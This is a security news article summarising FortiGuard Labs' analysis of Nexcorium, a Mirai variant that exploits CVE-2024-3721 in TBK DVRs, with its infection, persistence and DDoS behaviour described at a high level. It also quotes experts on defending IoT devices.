A recently uncovered malware campaign has drawn considerable attention for its exploitation of a serious command injection vulnerability plaguing digital video recorder (DVR) devices. FortiGuard Labs, renowned for its cybersecurity expertise, has conducted a detailed analysis of this threat, revealing the intricacies of the operation and its implications for cybersecurity.
The focus of the campaign is on a specific vulnerability designated as CVE-2024-3721, particularly affecting TBK DVR systems. This vulnerability enables malicious actors to gain unauthorized access to these devices, allowing them to install a multifaceted Mirai variant malware, referred to as Nexcorium. The research highlights how this malware draws on the architecture of the original Mirai botnet but enhances its capabilities for a broader and more damaging range of attacks.
Research from Fortinet indicates that the initial phase of the attack involves sending carefully crafted requests designed to manipulate vulnerable parameters within the DVR software. These requests trigger the execution of a downloader script, which then fetches malicious binaries tailored to various Linux environments—specifically targeting systems based on ARM, MIPS, and x86-64 architectures. Once these binaries are downloaded, they execute with elevated permissions, further tightening the attackers’ grip on the compromised devices.
Intriguingly, the attack traffic revealed a custom HTTP header that referenced a group known as “Nexus Team.” This detail has led security analysts to speculate that this may be an indication of a previously unidentified threat actor orchestrating the campaign. Following execution, the malware boldly announces its control over the compromised device, marking the success of the infection process.
Trey Ford, chief strategy and trust officer at Bugcrowd, emphasized the shortcomings of automated scanning in closing security gaps. He posited, “The Nexcorium campaign exemplifies why automated scanning alone cannot tackle exposure vulnerabilities. While machine-speed analysis can identify existing vulnerabilities, only human researchers can deeply understand how adversaries might chain those vulnerabilities to weaponize them, sustaining access over time.”
### Multi-Stage Infection and Persistence Techniques
Once deployed, Nexcorium initializes a configuration set, which is cleverly disguised using XOR encoding. This configuration encompasses vital elements such as command-and-control (C2) server details, specific attack instructions, and a list of built-in credentials used for conducting brute-force attacks on other devices.
The operational framework of Nexcorium closely mirrors that of traditional Mirai architecture, featuring modules strategically designated for scanning, maintaining persistence, and executing attacks. One of its notable components is a scanner designed to proliferate across networks by exploiting known vulnerabilities and default credentials over Telnet connections. Included within its library of exploits is CVE-2017-17215, a vulnerability recognized in Huawei routers, thereby extending its scope beyond just DVR devices to a wider array of susceptible targets.
In practical terms, Nexcorium employs a hybrid approach to infection scaling. It exploits CVE-2024-3721 for its initial breach, utilizes default credentials for lateral movement, and targets various CPU architectures while also leveraging legacy exploits. This multifaceted approach allows the malware to infiltrate a wide array of vulnerable devices, increasing its operational reach dramatically.
Maintaining persistence presents another key challenge, which Nexcorium addresses through multiple methods. The malware modifies system initialization files, constructs startup scripts, and registers as a system service to guarantee its activation even after a device is rebooted. Furthermore, it leverages cron jobs to schedule recurring tasks, ensuring long-term access and maintaining control over the infected systems.
### DDoS Capabilities and Operational Impact
After solidifying its foothold, Nexcorium establishes a connection to a remote command server for operational instructions. This remote link allows the malware to facilitate a variety of distributed denial-of-service (DDoS) techniques, including UDP floods, TCP SYN floods, and sophisticated application-layer attacks like SMTP flooding. Each attack command is dynamically delivered from the C2 server, which orchestrates coordinated operational campaigns across all infected devices.
John Gallagher, vice president of Viakoo Labs, highlighted the pervasive risk enterprises face from IoT devices compromised by Mirai and its variants, particularly through DDoS attacks. He underlined that without proactive measures from organizations to improve cyber hygiene within their IoT infrastructures, such attacks will likely proliferate due to the inherent ease of infection and the malware’s ability to move laterally within networks.
For security teams, Gallagher advised a focus on establishing foundational controls within IoT environments. He noted that traditional agent-based security solutions often fall short for these devices, as they typically do not permit agents to be installed. Instead, he suggested adopting agentless discovery and remediation techniques, emphasizing the importance of automated processes for password and certificate management as well as consistent firmware updates. Such practices are crucial in bolstering defenses against pervasive threats like Nexcorium.
In conclusion, the Nexcorium campaign serves as a stark reminder of the ever-evolving landscape of cyber threats and the necessity for robust security measures across all connected devices. The collaborative efforts from cybersecurity experts will be vital in addressing these vulnerabilities and safeguarding the integrity of IoT ecosystems.